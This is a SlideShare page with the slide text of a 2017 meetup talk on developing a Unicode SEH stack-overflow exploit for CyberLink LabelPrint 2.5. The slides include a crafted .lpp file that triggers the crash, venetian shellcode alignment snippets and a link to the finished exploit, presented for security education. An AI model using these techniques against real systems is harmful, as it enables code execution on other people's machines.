Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
SlideShare a Scribd company logo

CyberLink LabelPrint 2.5 Exploitation Process

Thomas Gregory
Thomas Gregory

This presentation was presented at IT Audit & IT Security Meetup #4 at Indonesian Cloud, Jakarta. The exploit development process was quite challenging and we think that it's worth to share. For educational purposes only.

Related slideshows

Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
 
1 of 44
Download to read offline
Exploit Development Cyberlink LabelPrint 2.5 Unicode Stack Overflow IT Audit & IT Security Meetup #4 - Sharing in the Cloud Indonesian Cloud, Jakarta, 13 October 2017
Who?  Thomas Gregory - @modpr0be  IT Security consultant @Spentera  Security researcher (occasionally)  focus on Windows exploitation  IT Security trainer (sometimes)  f3ci - ????  Security researcher  Penetration tester, red team  Appsec & simple exploit dev
What?  CyberLink LabelPrint 2.5  Labeling software  Embedded by default in CyberLink Power2Go installation.  Included as bloatware in all Lenovo, HP, Asus laptops somewhere between 2015-2016.
Why?  The exploit development is quite challenging and interesting  We want to share it for education purposes only.
Let’s Begin THE FUZZ
Fuzzing possibility  File Input  import  open media  open project  Registry overflow
Tools  Immunity Debugger  with mona plugin  Editor/IDE  /me using sublime text
LabelPrint Project  Project file with extension .lpp  Header <PROJECT version="1.0.00"> <INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017"> <TRACK name=“” />
The Bug  In the name parameter, inside the TRACK tag <PROJECT version="1.0.00"> <INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017"> <TRACK name="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA” /> </INFORMATION> </PROJECT>
SEH Overwritten  Overwritten SE Handler
Unicode Based  AA or 4141 will be .A.A or 00410041
What is SEH?  a piece of code that is written inside an application, with the purpose of dealing with the fact that the application throws an exception (taken from corelan)  an exception is an event, which occurs during the execution of a program, that disrupts the normal flow of the program's instructions.  a catcher, who is trying to catch unusual behavior.
What is SEH? This structure ( also called a SEH record) is 8 bytes and has 2 (4 bytes) elements :  a pointer to the next exception registration structure (in essence, to the next SEH record, in case the current handler is unable the handle the exception)  a pointer, the address of the actual code of the exception handler. (SE Handler)
Abusing SEH In other words, the payload must do the following things:  Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won’t kick in.  Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode)  Overwrite the SE handler with a pointer to an instruction that will bring you back to next SEH and execute the jumpcode.  The shellcode should be directly after the overwritten SE Handler. Some small jumpcode contained in the overwritten “pointer to next SEH record” will jump to it).
Abusing SEH  When the exception occurred, the position on the stack will going like this:  Possible value to overwrite SE Handler are POP something, POP something and RETN to the stack.  It will POP address that sit at the top of the stack, POP it again to take the second address, and RETN to execute the third address (which is now at the top of the stack)  The third address usually our supplied input buffer Top of stack Our pointer to next SEH address
Abusing SEH Image was taken from http://corelan.be with permission from Peter van Eeckhoutte (Corelan)
Unicode?  Unicode allows us to visually represent and/or manipulate text in most of the systems across the world in a consistent manner.  Unicode based exploit usually involved in  file/folder naming  part of input parameter that will deal with naming
More Info  Structured Exception Handler (SEH)  https://msdn.microsoft.com/en- us/library/windows/desktop/ms680657(v=vs.85).aspx  https://www.corelan.be/index.php/2009/07/25/writi ng-buffer-overflow-exploits-a-quick-and-basic- tutorial-part-3-seh/  https://blog.spentera.com/2011/09/14/seh-based- stack-overflow-the-basic/  Unicode based exploit  https://www.corelan.be/index.php/2009/11/06/expl oit-writing-tutorial-part-7-unicode-from-0x00410041- to-calc/
SEH + Unicode = Venetian PROBABLY THE MOST HATED COMBINATION
Venetian Shellcode  One of the registers must point at the beginning of the shellcode.  One register must point at a memory location that is writeable (and where it’s ok to write the new reassembled shellcode)  Normal venetian prepend shellcode  Push another register to stack (ESP)  Pop stack (ESP) into EAX  Align the EAX register with add/sub instruction  Push EAX register into stack (ESP)  RET (return to the beginning of shellcode at EAX)  Sadly, we won’t face a normal venetian approach
Typical Venetian Unicode Prepend Opcode Align EAX Register •If we use EAX as BufferRegister, we need to align EAX to point to our Buffer “Stack Walking” •Walk over the Next SEH and SEH. RET to Shellcode • Shellcode executed
Typical Venetian Unicode Prepend Opcode ven = "x56" #push esi ven += "x41" #align ven += "x58" #pop eax ven += "x41" #align ven += "x05x04x01" #add eax,01000400 ven += "x41" #align ven += "x2dx01x01" #add eax,01000100 ven += "x41" #align ven += "x50" #push eax ven += "x41" #align ven += "xc3" #ret Depends on where our buffer is. Use EAX as a BufferRegister
Problem?  Limited instruction (because of Unicode)  need to find POP POP RET with Unicode friendly  All hex value between 0x80 – 0xFF are marked as bad  Yes, RET opcode (C3) is also included in the bad character list.  Meanwhile, our venetian shellcode need RET  Typical Venetian
Sh*t!
Solution  Find a proper Unicode friendly PPR (pop pop ret) instructions address somewhere in the library or executable  Create “our version” of RET  Fill the stack (ESP) with our shellcode  Pointing our RET to CALL ESP instruction address  This will alter the flow of execution.  EAX must be pointing to the beginning of our shellcode.  “Stack walk” until we meet shellcode.
Our Venetian Unicode Shellcode Align EAX Register Calculate where RET will be placed Construct RET in EAX Calculate EAX for CALL ESP Opcode Reaching RET, Execute CALL ESP Re-aligning EAX “Stack walk” to Shellcode Bind shell 4444
pop pop ret  !mona seh  Fortunately, we found one address that is an Unicode friendly (0x0044002c) in the main program (LabelPrint.exe)
Construct RET (1)  Calculate the value of EAX register, preparing the address where we exactly want the decoded RET being placed later in the stack.  Limited calculation (because of UNICODE)  Zeroing the EAX register first  xor eax,eax
Construct RET (2) Preparing address to push our RET:  push esp  pop eax  and EAX register with 01001B00  and EAX register with 01000100  push EAX  pop ESP ven += "x42" #nop ven += "x54" #push esp ven += "x42" #nop ven += "x58" #pop eax ven += "x42" #nop ven += "x05x1Bx01" #add eax 01001B00 ven += "x42" #nop ven += "x2dx01x01" #sub eax 01001000 ven += "x42" #nop ven += "x50" #push eax ven += "x42" #nop ven += "x5c" #pop esp
Construct RET (3)  After the calculation in EAX, now the stack (ESP) will be pointing at 0x0012F655 (the same value as EAX)  This is important for our RET decoding address later.
Construct RET (4)
Zeroing Out EAX  We need to clear the EAX register for the next calculation of the RET opcode.  After EAX is zeroed out we can calculate the EAX register to meet 0xC300C300 (RET opcode).  We can perform the calculation with AND operand :  AND EAX register with 7e007e00  AND EAX register with 01000100
Zeroing Out EAX ven += "x42" #nop ven += "x25x7ex7e" #and eax,7e007e00 ven += "x42" #nop ven += "x25x01x01" #and eax,01000100
Construct RET (5) Preparing RET opcode:  Zeroing Out EAX first (done)  XOR EAX register with 7f007f00  ADD EAX register with 44004400  PUSH EDI  PUSH EAX
The RET Opcode (1) ven += "x35x7fx7f" #xor eax,7f007f00 ven += "x42" #nop ven += "x05x44x44" #add eax,44004400 ven += "x42" #nop ven += "x57" #push edi/padding ven += "x42" #nop ven += "x50" #push eax
The RET Opcode (2)
Construct CALL to ESP (1)
Construct CALL to ESP (2)
Construct CALL to ESP (3)
Stack Walk to Shellcode
Our Venetian Shellcode ven += "x58" #pop eax ven += "x42" #nop ven += "x58" #pop eax ven += "x42" #nop ven += "x05x10x01" #add eax, 11001900, align eax to our buffer ven += "x42" #nop ven += "x2dx0ex01" #add eax, 11001800, align eax to our buffer ven += "x42" #nop ven += "x50" #push eax ven += "x42" #nop ven += "x5C" #pop esp ven += "x42" #nop ven += "x58" #pop eax ven += "x42" #nop ven += "x05x53x7c" #add eax 7c005300 part of call esp ven += "x42" #nop ven += "x50" #push eax ven += "x42" * 68 #padding to fill the stack ven += "x7bx32" #part of call esp
Final Exploit https://www.exploit-db.com/exploits/42777/
Solution  For now, do not user CyberLink Label Print.
Thank you research@spentera.id

More Related Content

What's hot

Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Vincenzo Iozzo
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
Ce.Se.N.A. Security
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Ajin Abraham
 
Javascript: The Important Bits
Javascript: The Important BitsJavascript: The Important Bits
Javascript: The Important Bits
Zumba Fitness - Technology Team
 
Operating System Assignment Help
Operating System Assignment HelpOperating System Assignment Help
Operating System Assignment Help
Programming Homework Help
 
Introduction to Perl Programming
Introduction to Perl ProgrammingIntroduction to Perl Programming
Introduction to Perl Programming
Collaboration Technologies
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
camsec
 
Computer Science Assignment Help
Computer Science Assignment HelpComputer Science Assignment Help
Computer Science Assignment Help
Programming Homework Help
 
How to Make an Echo Server
How to Make an Echo ServerHow to Make an Echo Server
How to Make an Echo Server
adil raja
 
Seh based attack
Seh based attackSeh based attack
Seh based attack
Mihir Shah
 
Programming Assignment Help
Programming Assignment HelpProgramming Assignment Help
Programming Assignment Help
Programming Homework Help
 
merged_document_3
merged_document_3merged_document_3
merged_document_3
tori hoff
 
Perl IO
Perl IOPerl IO
Perl IO
guest998254
 
Computer Science Homework Help
Computer Science Homework HelpComputer Science Homework Help
Computer Science Homework Help
Programming Homework Help
 
Process management
Process managementProcess management
Process management
Utkarsh Kulshrestha
 
Operating System Engineering Quiz
Operating System Engineering QuizOperating System Engineering Quiz
Operating System Engineering Quiz
Programming Homework Help
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Ajin Abraham
 
Remote Command Execution
Remote Command ExecutionRemote Command Execution
Remote Command Execution
adil raja
 
Reverse Engineering: C++ "for" operator
Reverse Engineering: C++ "for" operatorReverse Engineering: C++ "for" operator
Reverse Engineering: C++ "for" operator
erithion
 

What's hot (20)

Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
 
Javascript: The Important Bits
Javascript: The Important BitsJavascript: The Important Bits
Javascript: The Important Bits
 
Operating System Assignment Help
Operating System Assignment HelpOperating System Assignment Help
Operating System Assignment Help
 
Introduction to Perl Programming
Introduction to Perl ProgrammingIntroduction to Perl Programming
Introduction to Perl Programming
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
 
Computer Science Assignment Help
Computer Science Assignment HelpComputer Science Assignment Help
Computer Science Assignment Help
 
How to Make an Echo Server
How to Make an Echo ServerHow to Make an Echo Server
How to Make an Echo Server
 
Seh based attack
Seh based attackSeh based attack
Seh based attack
 
Programming Assignment Help
Programming Assignment HelpProgramming Assignment Help
Programming Assignment Help
 
merged_document_3
merged_document_3merged_document_3
merged_document_3
 
Perl IO
Perl IOPerl IO
Perl IO
 
Computer Science Homework Help
Computer Science Homework HelpComputer Science Homework Help
Computer Science Homework Help
 
Process management
Process managementProcess management
Process management
 
Operating System Engineering Quiz
Operating System Engineering QuizOperating System Engineering Quiz
Operating System Engineering Quiz
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
 
Remote Command Execution
Remote Command ExecutionRemote Command Execution
Remote Command Execution
 
Reverse Engineering: C++ "for" operator
Reverse Engineering: C++ "for" operatorReverse Engineering: C++ "for" operator
Reverse Engineering: C++ "for" operator
 

Similar to CyberLink LabelPrint 2.5 Exploitation Process

Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse Engineering
Sumutiu Marius
 
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part IReturn Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
n|u - The Open Security Community
 
Heap overflows for humans – 101
Heap overflows for humans – 101Heap overflows for humans – 101
Heap overflows for humans – 101
Craft Symbol
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
Exploit Development with Python
Exploit Development with PythonExploit Development with Python
Exploit Development with Python
Thomas Gregory
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
ironSource
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
hughpearse
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
Tomer Zait
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
Payampardaz
 
Virtual machine re building
Virtual machine re buildingVirtual machine re building
Virtual machine re building
Martin Dominguez Alvarez
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
Ajin Abraham
 
Listen afup 2010
Listen afup 2010Listen afup 2010
Listen afup 2010
Gabriele Santini
 
The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer Overflows
UTD Computer Security Group
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Alexandre Moneger
 
exploiting heap overflows
exploiting heap overflowsexploiting heap overflows
exploiting heap overflows
primelude
 
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van KetwichCreating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
Willem van Ketwich
 
Packers
PackersPackers
Packers
Ange Albertini
 
Generacion de codigo ensamblado
Generacion de codigo ensambladoGeneracion de codigo ensamblado
Generacion de codigo ensamblado
tre_na_gil
 
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
Patricia Aas
 
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming BasicsReversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
securityxploded
 

Similar to CyberLink LabelPrint 2.5 Exploitation Process (20)

Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse Engineering
 
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part IReturn Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
 
Heap overflows for humans – 101
Heap overflows for humans – 101Heap overflows for humans – 101
Heap overflows for humans – 101
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Exploit Development with Python
Exploit Development with PythonExploit Development with Python
Exploit Development with Python
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
 
Virtual machine re building
Virtual machine re buildingVirtual machine re building
Virtual machine re building
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
 
Listen afup 2010
Listen afup 2010Listen afup 2010
Listen afup 2010
 
The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer Overflows
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
 
exploiting heap overflows
exploiting heap overflowsexploiting heap overflows
exploiting heap overflows
 
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van KetwichCreating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
 
Packers
PackersPackers
Packers
 
Generacion de codigo ensamblado
Generacion de codigo ensambladoGeneracion de codigo ensamblado
Generacion de codigo ensamblado
 
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
 
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming BasicsReversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
 

Recently uploaded

Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...
Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...
Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...
Alluxio, Inc.
 
Full stack odoo development solutions provided by Fortune 500 trusted supplier
Full stack odoo development solutions provided by Fortune 500 trusted supplierFull stack odoo development solutions provided by Fortune 500 trusted supplier
Full stack odoo development solutions provided by Fortune 500 trusted supplier
Odoo Red
 
SOCRadar's Hand Guide For the 2024 Paris Olympics--.pdf
SOCRadar's Hand Guide For the 2024 Paris Olympics--.pdfSOCRadar's Hand Guide For the 2024 Paris Olympics--.pdf
SOCRadar's Hand Guide For the 2024 Paris Olympics--.pdf
SOCRadar
 
Maturity Model Presentation from Open Compliance Summit 2023
Maturity Model Presentation from Open Compliance Summit 2023Maturity Model Presentation from Open Compliance Summit 2023
Maturity Model Presentation from Open Compliance Summit 2023
Shane Coughlan
 
Cloud Databases and Big Data - Mechlin.pptx
Cloud Databases and Big Data - Mechlin.pptxCloud Databases and Big Data - Mechlin.pptx
Cloud Databases and Big Data - Mechlin.pptx
Mitchell Marsh
 
How Odoo Accounting Can Save Your Business, Time and Money.pdf
How Odoo Accounting Can Save Your Business, Time and Money.pdfHow Odoo Accounting Can Save Your Business, Time and Money.pdf
How Odoo Accounting Can Save Your Business, Time and Money.pdf
Banibro IT Solutions
 
Moder Java-WeAreDevelopers - Berlin - 2024.pdf
Moder Java-WeAreDevelopers - Berlin - 2024.pdfModer Java-WeAreDevelopers - Berlin - 2024.pdf
Moder Java-WeAreDevelopers - Berlin - 2024.pdf
RonVeen1
 
My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)
My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)
My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)
Apk2me
 
JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)
JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)
JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)
Andre Hora
 
How to Choose the Right Partner for Outsource Website Development
How to Choose the Right Partner for Outsource Website DevelopmentHow to Choose the Right Partner for Outsource Website Development
How to Choose the Right Partner for Outsource Website Development
Rollout IT
 
The two flavors of Python 3.13 - PyHEP 2024
The two flavors of Python 3.13 - PyHEP 2024The two flavors of Python 3.13 - PyHEP 2024
The two flavors of Python 3.13 - PyHEP 2024
Henry Schreiner
 
Limited Time Offer! Pay One Time to Access to Sociosight for Only $95
Limited Time Offer! Pay One Time to Access to Sociosight for Only $95Limited Time Offer! Pay One Time to Access to Sociosight for Only $95
Limited Time Offer! Pay One Time to Access to Sociosight for Only $95
Sri Damayanti
 
Asset Management software Technologies.pdf
Asset Management software Technologies.pdfAsset Management software Technologies.pdf
Asset Management software Technologies.pdf
Hr365.us smith
 
Viswanath_Cover letter_Scrum Master_10+yrs
Viswanath_Cover letter_Scrum Master_10+yrsViswanath_Cover letter_Scrum Master_10+yrs
Viswanath_Cover letter_Scrum Master_10+yrs
cviswanathsai
 
CrushFTP 10.4.0.29 PC Software - WhizNews
CrushFTP 10.4.0.29 PC Software - WhizNewsCrushFTP 10.4.0.29 PC Software - WhizNews
CrushFTP 10.4.0.29 PC Software - WhizNews
Eman Nisar
 
Gurugram Meetup Salesforce integration patterns - 20 July 2024.pptx
Gurugram Meetup Salesforce integration patterns - 20 July 2024.pptxGurugram Meetup Salesforce integration patterns - 20 July 2024.pptx
Gurugram Meetup Salesforce integration patterns - 20 July 2024.pptx
Gupta Pryank
 
Healthcare software development made easy_ A step-by-step guide.pdf
Healthcare software development made easy_ A step-by-step guide.pdfHealthcare software development made easy_ A step-by-step guide.pdf
Healthcare software development made easy_ A step-by-step guide.pdf
mohitd6
 
Software Development Company in Florida.pdf
Software Development Company in Florida.pdfSoftware Development Company in Florida.pdf
Software Development Company in Florida.pdf
Getweys
 
Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...
Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...
Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...
Andre Hora
 
Python Objects and Data Structure Basics
Python Objects and Data Structure BasicsPython Objects and Data Structure Basics
Python Objects and Data Structure Basics
roldangomezjuan0
 

Recently uploaded (20)

Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...
Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...
Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...
 
Full stack odoo development solutions provided by Fortune 500 trusted supplier
Full stack odoo development solutions provided by Fortune 500 trusted supplierFull stack odoo development solutions provided by Fortune 500 trusted supplier
Full stack odoo development solutions provided by Fortune 500 trusted supplier
 
SOCRadar's Hand Guide For the 2024 Paris Olympics--.pdf
SOCRadar's Hand Guide For the 2024 Paris Olympics--.pdfSOCRadar's Hand Guide For the 2024 Paris Olympics--.pdf
SOCRadar's Hand Guide For the 2024 Paris Olympics--.pdf
 
Maturity Model Presentation from Open Compliance Summit 2023
Maturity Model Presentation from Open Compliance Summit 2023Maturity Model Presentation from Open Compliance Summit 2023
Maturity Model Presentation from Open Compliance Summit 2023
 
Cloud Databases and Big Data - Mechlin.pptx
Cloud Databases and Big Data - Mechlin.pptxCloud Databases and Big Data - Mechlin.pptx
Cloud Databases and Big Data - Mechlin.pptx
 
How Odoo Accounting Can Save Your Business, Time and Money.pdf
How Odoo Accounting Can Save Your Business, Time and Money.pdfHow Odoo Accounting Can Save Your Business, Time and Money.pdf
How Odoo Accounting Can Save Your Business, Time and Money.pdf
 
Moder Java-WeAreDevelopers - Berlin - 2024.pdf
Moder Java-WeAreDevelopers - Berlin - 2024.pdfModer Java-WeAreDevelopers - Berlin - 2024.pdf
Moder Java-WeAreDevelopers - Berlin - 2024.pdf
 
My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)
My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)
My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)
 
JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)
JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)
JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)
 
How to Choose the Right Partner for Outsource Website Development
How to Choose the Right Partner for Outsource Website DevelopmentHow to Choose the Right Partner for Outsource Website Development
How to Choose the Right Partner for Outsource Website Development
 
The two flavors of Python 3.13 - PyHEP 2024
The two flavors of Python 3.13 - PyHEP 2024The two flavors of Python 3.13 - PyHEP 2024
The two flavors of Python 3.13 - PyHEP 2024
 
Limited Time Offer! Pay One Time to Access to Sociosight for Only $95
Limited Time Offer! Pay One Time to Access to Sociosight for Only $95Limited Time Offer! Pay One Time to Access to Sociosight for Only $95
Limited Time Offer! Pay One Time to Access to Sociosight for Only $95
 
Asset Management software Technologies.pdf
Asset Management software Technologies.pdfAsset Management software Technologies.pdf
Asset Management software Technologies.pdf
 
Viswanath_Cover letter_Scrum Master_10+yrs
Viswanath_Cover letter_Scrum Master_10+yrsViswanath_Cover letter_Scrum Master_10+yrs
Viswanath_Cover letter_Scrum Master_10+yrs
 
CrushFTP 10.4.0.29 PC Software - WhizNews
CrushFTP 10.4.0.29 PC Software - WhizNewsCrushFTP 10.4.0.29 PC Software - WhizNews
CrushFTP 10.4.0.29 PC Software - WhizNews
 
Gurugram Meetup Salesforce integration patterns - 20 July 2024.pptx
Gurugram Meetup Salesforce integration patterns - 20 July 2024.pptxGurugram Meetup Salesforce integration patterns - 20 July 2024.pptx
Gurugram Meetup Salesforce integration patterns - 20 July 2024.pptx
 
Healthcare software development made easy_ A step-by-step guide.pdf
Healthcare software development made easy_ A step-by-step guide.pdfHealthcare software development made easy_ A step-by-step guide.pdf
Healthcare software development made easy_ A step-by-step guide.pdf
 
Software Development Company in Florida.pdf
Software Development Company in Florida.pdfSoftware Development Company in Florida.pdf
Software Development Company in Florida.pdf
 
Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...
Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...
Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...
 
Python Objects and Data Structure Basics
Python Objects and Data Structure BasicsPython Objects and Data Structure Basics
Python Objects and Data Structure Basics
 

CyberLink LabelPrint 2.5 Exploitation Process

  • 1. Exploit Development Cyberlink LabelPrint 2.5 Unicode Stack Overflow IT Audit & IT Security Meetup #4 - Sharing in the Cloud Indonesian Cloud, Jakarta, 13 October 2017
